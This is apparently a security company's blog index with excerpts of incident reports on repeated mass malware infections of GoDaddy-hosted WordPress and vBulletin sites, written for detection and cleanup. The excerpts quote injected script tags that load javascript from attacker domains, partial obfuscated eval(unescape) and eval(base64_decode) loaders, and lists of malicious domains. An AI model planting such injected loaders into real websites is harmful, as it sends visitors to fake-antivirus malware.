Ask Sucuri: What should I know when engaging a Web Malware Company?

We work in a business in which it is always chaos. In most situations the client is often distraught, vulnerable, and is plagued with this feeling of being out of control. It is the business of web malware cleanup. The last thing any website owner wants is to delay the cleanup process because of silly things that could have been easily prevented.

In our mind, there are three things you must know before engaging with any web malware company:

  • Know Your Host
  • Know How to Access Your Server
  • Have a Backup

As simple as they may appear, they still remain allusive to many.
Read More

GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:


Read More

Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).

This hack also injects the malware on every post in the database, but this time encoded as:

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..


Read More

Hilary Kneber Strikes Again – welcometotheglobalisnet

It seems that after a few months quiet, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts. Basically they modify every PHP file and the database to make sure every page in the infected site is loading malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>

Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

Which infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet so the risk is very high for everyone visiting an infected site.

What happens when someone clicks an infected site?

What the malware does is very simple, it contacts a few domains:

Read More

Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>

As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:

Read More

Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll.php?k=1

www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.in

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

www3.large-defense1.in


Read More

GoDaddy hacked – Fixing the “headers already sent” error

As you saw over the last few days, various sites at GoDaddy were exploited causing lots of complaints on Twitter and in other places about GoDaddy security.

Well, today, many of those sites were reinfected (again) and GoDaddy tried to fix the them automatically. However, their scripts failed for some reason, leaving some sites with empty lines at the top of the PHP files, causing these errors to show up:

Warning: Cannot modify header information – headers already sent by (output started at..

So, if your sites are showing these errors, just run this script:

http://sucuri.net/malware/helpers/clear_php.txt

(right click – save as clear_php.txt, rename to clear.php and upload via FTP to your site. Open your browser and execute it as yoursite.com/clear.php).

That should fix these issues. If you need any help, contact us at http://sucuri.net/support

GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber

We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

Which are generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:



Read More

GoDaddy sites hacked with cloudisthebestnow

If you thought your problems at GoDaddy were over, well, not yet.

We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.

This is how the script will look like in your pages:

< script src = http://cloudisthebestnow.com/kp.php >

It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.

Read More

Here we go again – Problem at GoDaddy continues

Update from GoDaddy: Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.
Read More